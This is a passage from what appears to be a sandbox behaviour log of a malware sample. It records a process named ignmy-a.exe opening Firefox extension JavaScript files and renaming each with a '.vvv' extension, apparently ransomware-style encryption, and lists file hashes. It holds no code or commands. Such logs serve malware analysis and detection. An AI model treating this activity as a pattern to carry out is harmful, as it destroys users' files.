  12262.   er-e10s-adapter.js
  12263.     828     2658
  12264. File   
  12265. Close
  12266.    
  12267. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12268.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
  12269.   er-e10s-adapter.js
  12270.  MD5:  b2665e75053e5bce22d59c364f5cfee0
  12271.  SHA1: 179f0812df6f989f9707376c634dea8e5fb9fa0e
  12272.     828     3086
  12273. File   
  12274. Rename
  12275.    
  12276. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12277.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
  12278.   er-e10s-adapter.js
  12279. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12280.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
  12281.   er-e10s-adapter.js.vvv
  12282.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12283.  MD5:  b2665e75053e5bce22d59c364f5cfee0
  12284.  SHA1: 179f0812df6f989f9707376c634dea8e5fb9fa0e
  12285.     828     3086
  12286. File   
  12287. Open
  12288.    
  12289. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12290.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
  12291.   er.js
  12292.     828     4208
  12293. File   
  12294. Close
  12295.    
  12296. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12297.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
  12298.   er.js
  12299.  MD5:  7d5538216a2b9b031cac74a1d506bc8a
  12300.  SHA1: 31c30487f8d575a2b7182c7fe7c655745946d852
  12301.     828     4638
  12302. File   
  12303. Rename
  12304.    
  12305. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12306.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
  12307.   er.js
  12308. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12309.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tim
  12310.   er.js.vvv
  12311.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12312.  MD5:  7d5538216a2b9b031cac74a1d506bc8a
  12313.  SHA1: 31c30487f8d575a2b7182c7fe7c655745946d852
  12314.     828     4638
  12315. File   
  12316. Open
  12317.    
  12318. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12319.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12320.   ceback.js
  12321.     828     5081
  12322. File   
  12323. Close
  12324.    
  12325. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12326.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12327.   ceback.js
  12328.  MD5:  8575bee814a37427ed2e1b208edb33d8
  12329.  SHA1: a0144e4f6a8d3c3afa11d656c68fdd029ff66499
  12330.     828     5502
  12331. File   
  12332. Rename
  12333.    
  12334. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12335.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12336.   ceback.js
  12337. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12338.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12339.   ceback.js.vvv
  12340.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12341.  MD5:  8575bee814a37427ed2e1b208edb33d8
  12342.  SHA1: a0144e4f6a8d3c3afa11d656c68fdd029ff66499
  12343.     828     5502
  12344. File   
  12345. Open
  12346.    
  12347. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12348.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12349.   its\core.js
  12350.     828     11340
  12351. File   
  12352. Close
  12353.    
  12354. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12355.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12356.   its\core.js
  12357.  MD5:  487e0a55d0812a2fe8d33e38b97f363b
  12358.  SHA1: bbbaa5279ff48795d8fb392b4a7cc5b4f82df70f
  12359.     828     11758
  12360. File   
  12361. Rename
  12362.    
  12363. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12364.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12365.   its\core.js
  12366. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12367.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12368.   its\core.js.vvv
  12369.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12370.  MD5:  487e0a55d0812a2fe8d33e38b97f363b
  12371.  SHA1: bbbaa5279ff48795d8fb392b4a7cc5b4f82df70f
  12372.     828     11758
  12373. File   
  12374. Open
  12375.    
  12376. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12377.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12378.   its.js
  12379.     828     7550
  12380. File   
  12381. Close
  12382.    
  12383. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12384.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12385.   its.js
  12386.  MD5:  f23f23379935795e8a614ac7afecf47d
  12387.  SHA1: 09164e62db29bc248a0d14bcb9135093a703ac39
  12388.     828     7966
  12389. File   
  12390. Rename
  12391.    
  12392. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12393.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12394.   its.js
  12395. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12396.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tra
  12397.   its.js.vvv
  12398.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12399.  MD5:  f23f23379935795e8a614ac7afecf47d
  12400.  SHA1: 09164e62db29bc248a0d14bcb9135093a703ac39
  12401.     828     7966
  12402. File   
  12403. Open
  12404.    
  12405. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12406.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\typ
  12407.   e.js
  12408.     828     11432
  12409. File   
  12410. Close
  12411.    
  12412. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12413.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\typ
  12414.   e.js
  12415.  MD5:  3afce4b0c8fa1c6bf01b466799ca20b0
  12416.  SHA1: 667f05bab5fcd4978ce81d372638e3bfbb0d00c5
  12417.     828     11854
  12418. File   
  12419. Rename
  12420.    
  12421. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12422.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\typ
  12423.   e.js
  12424. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12425.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\typ
  12426.   e.js.vvv
  12427.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12428.  MD5:  3afce4b0c8fa1c6bf01b466799ca20b0
  12429.  SHA1: 667f05bab5fcd4978ce81d372638e3bfbb0d00c5
  12430.     828     11854
  12431. File   
  12432. Open
  12433.    
  12434. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12435.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12436.   t-test-finder.js
  12437.     828     3479
  12438. File   
  12439. Close
  12440.    
  12441. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12442.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12443.   t-test-finder.js
  12444.  MD5:  7babdd7e2b29d51d504d14544074f3de
  12445.  SHA1: 046db9743ab3d7db0abbfd7f5bad7fa3f6ae968a
  12446.     828     3902
  12447. File   
  12448. Rename
  12449.    
  12450. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12451.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12452.   t-test-finder.js
  12453. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12454.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12455.   t-test-finder.js.vvv
  12456.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12457.  MD5:  7babdd7e2b29d51d504d14544074f3de
  12458.  SHA1: 046db9743ab3d7db0abbfd7f5bad7fa3f6ae968a
  12459.     828     3902
  12460. File   
  12461. Open
  12462.    
  12463. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12464.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12465.   t-test.js
  12466.     828     11539
  12467. File   
  12468. Close
  12469.    
  12470. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12471.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12472.   t-test.js
  12473.  MD5:  a1369704929a52718965e1a9b1f3ccef
  12474.  SHA1: 8c732168b44ca12c8dc73a5f01d8691f7057686c
  12475.     828     11966
  12476. File   
  12477. Rename
  12478.    
  12479. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12480.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12481.   t-test.js
  12482. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12483.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uni
  12484.   t-test.js.vvv
  12485.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12486.  MD5:  a1369704929a52718965e1a9b1f3ccef
  12487.  SHA1: 8c732168b44ca12c8dc73a5f01d8691f7057686c
  12488.     828     11966
  12489. File   
  12490. Open
  12491.    
  12492. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12493.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unl
  12494.   oad.js
  12495.     828     1278
  12496. File   
  12497. Close
  12498.    
  12499. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12500.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unl
  12501.   oad.js
  12502.  MD5:  9940ad1eb938784e5cad8dc7ea47ef98
  12503.  SHA1: 65a45d257191dab39c7299490fdab40d075cc7f6
  12504.     828     1694
  12505. File   
  12506. Rename
  12507.    
  12508. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12509.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unl
  12510.   oad.js
  12511. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12512.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unl
  12513.   oad.js.vvv
  12514.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12515.  MD5:  9940ad1eb938784e5cad8dc7ea47ef98
  12516.  SHA1: 65a45d257191dab39c7299490fdab40d075cc7f6
  12517.     828     1694
  12518. File   
  12519. Open
  12520.    
  12521. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12522.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12523.   -e10s-adapter.js
  12524.     828     4008
  12525. File   
  12526. Close
  12527.    
  12528. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12529.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12530.   -e10s-adapter.js
  12531.  MD5:  6e64ec92bad4e628af4794ffc4d9764d
  12532.  SHA1: aa865e71fa131019b772e0fa7275a1a7248364c5
  12533.     828     4430
  12534. File   
  12535. Rename
  12536.    
  12537. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12538.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12539.   -e10s-adapter.js
  12540. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12541.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12542.   -e10s-adapter.js.vvv
  12543.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12544.  MD5:  6e64ec92bad4e628af4794ffc4d9764d
  12545.  SHA1: aa865e71fa131019b772e0fa7275a1a7248364c5
  12546.     828     4430
  12547. File   
  12548. Open
  12549.    
  12550. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12551.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12552.   .js
  12553.     828     4269
  12554. File   
  12555. Close
  12556.    
  12557. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12558.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12559.   .js
  12560.  MD5:  ea6e945f005f1d147d36c6d5aab4684c
  12561.  SHA1: a580b5458144a0ba8863b1407295011ee14fcca0
  12562.     828     4686
  12563. File   
  12564. Rename
  12565.    
  12566. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12567.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12568.   .js
  12569. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12570.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url
  12571.   .js.vvv
  12572.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12573.  MD5:  ea6e945f005f1d147d36c6d5aab4684c
  12574.  SHA1: a580b5458144a0ba8863b1407295011ee14fcca0
  12575.     828     4686
  12576. File   
  12577. Open
  12578.    
  12579. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12580.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12581.   ls\data.js
  12582.     828     3912
  12583. File   
  12584. Close
  12585.    
  12586. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12587.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12588.   ls\data.js
  12589.  MD5:  65c416b691d0c6c4e6c1c64b3c784950
  12590.  SHA1: 218717ec56e80e50adede173c447b81c46b5a5e2
  12591.     828     4334
  12592. File   
  12593. Rename
  12594.    
  12595. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12596.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12597.   ls\data.js
  12598. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12599.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12600.   ls\data.js.vvv
  12601.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12602.  MD5:  65c416b691d0c6c4e6c1c64b3c784950
  12603.  SHA1: 218717ec56e80e50adede173c447b81c46b5a5e2
  12604.     828     4334
  12605. File   
  12606. Open
  12607.    
  12608. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12609.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12610.   ls\function.js
  12611.     828     2710
  12612. File   
  12613. Close
  12614.    
  12615. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12616.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12617.   ls\function.js
  12618.  MD5:  327aa01d5e3c1f43520f755abdebfdd2
  12619.  SHA1: ee1feeec918f98a50c159a556a58fd42dc36ab0e
  12620.     828     3134
  12621. File   
  12622. Rename
  12623.    
  12624. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12625.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12626.   ls\function.js
  12627. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12628.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12629.   ls\function.js.vvv
  12630.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12631.  MD5:  327aa01d5e3c1f43520f755abdebfdd2
  12632.  SHA1: ee1feeec918f98a50c159a556a58fd42dc36ab0e
  12633.     828     3134
  12634. File   
  12635. Open
  12636.    
  12637. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12638.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12639.   ls\registry.js
  12640.     828     3318
  12641. File   
  12642. Close
  12643.    
  12644. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12645.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12646.   ls\registry.js
  12647.  MD5:  bce4fa510248714e55a79fc69ec7d279
  12648.  SHA1: a51a2989394135025900dc4a9117e01bee0dfc6d
  12649.     828     3742
  12650. File   
  12651. Rename
  12652.    
  12653. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12654.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12655.   ls\registry.js
  12656. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12657.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12658.   ls\registry.js.vvv
  12659.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12660.  MD5:  bce4fa510248714e55a79fc69ec7d279
  12661.  SHA1: a51a2989394135025900dc4a9117e01bee0dfc6d
  12662.     828     3742
  12663. File   
  12664. Open
  12665.    
  12666. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12667.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12668.   ls\thumbnail.js
  12669.     828     3099
  12670. File   
  12671. Close
  12672.    
  12673. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12674.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12675.   ls\thumbnail.js
  12676.  MD5:  6113df0e2bd8dae52f5c150bccee756e
  12677.  SHA1: cfb66aceaa4487cd8b7edb1c2688c718ff99031e
  12678.     828     3518
  12679. File   
  12680. Rename
  12681.    
  12682. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12683.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12684.   ls\thumbnail.js
  12685. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12686.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\uti
  12687.   ls\thumbnail.js.vvv
  12688.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12689.  MD5:  6113df0e2bd8dae52f5c150bccee756e
  12690.  SHA1: cfb66aceaa4487cd8b7edb1c2688c718ff99031e
  12691.     828     3518
  12692. File   
  12693. Open
  12694.    
  12695. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12696.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12697.   dow-utils.js
  12698.     828     6368
  12699. File   
  12700. Close
  12701.    
  12702. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12703.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12704.   dow-utils.js
  12705.  MD5:  74f6f87f3d4db34ed0ad9460621e10f8
  12706.  SHA1: 4c76c982b1c7c19b89d55f5a854aadcd60cd4300
  12707.     828     6798
  12708. File   
  12709. Rename
  12710.    
  12711. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12712.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12713.   dow-utils.js
  12714. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12715.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12716.   dow-utils.js.vvv
  12717.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12718.  MD5:  74f6f87f3d4db34ed0ad9460621e10f8
  12719.  SHA1: 4c76c982b1c7c19b89d55f5a854aadcd60cd4300
  12720.     828     6798
  12721. File   
  12722. Open
  12723.    
  12724. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12725.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12726.   dows\dom.js
  12727.     828     2259
  12728. File   
  12729. Close
  12730.    
  12731. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12732.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12733.   dows\dom.js
  12734.  MD5:  98385d24a0fddb82b87f4ef0075a0469
  12735.  SHA1: 99ba4d9525597c2fca4cf0ee61ce8ebdbd15257c
  12736.     828     2686
  12737. File   
  12738. Rename
  12739.    
  12740. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12741.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12742.   dows\dom.js
  12743. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12744.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12745.   dows\dom.js.vvv
  12746.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12747.  MD5:  98385d24a0fddb82b87f4ef0075a0469
  12748.  SHA1: 99ba4d9525597c2fca4cf0ee61ce8ebdbd15257c
  12749.     828     2686
  12750. File   
  12751. Open
  12752.    
  12753. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12754.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12755.   dows\loader.js
  12756.     828     5598
  12757. File   
  12758. Close
  12759.    
  12760. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12761.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12762.   dows\loader.js
  12763.  MD5:  79fa248ac67599d30631214fbb93cf99
  12764.  SHA1: f5057e306a2e5ccbe19b42e5b7a8d364bbf4ac54
  12765.     828     6014
  12766. File   
  12767. Rename
  12768.    
  12769. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12770.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12771.   dows\loader.js
  12772. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
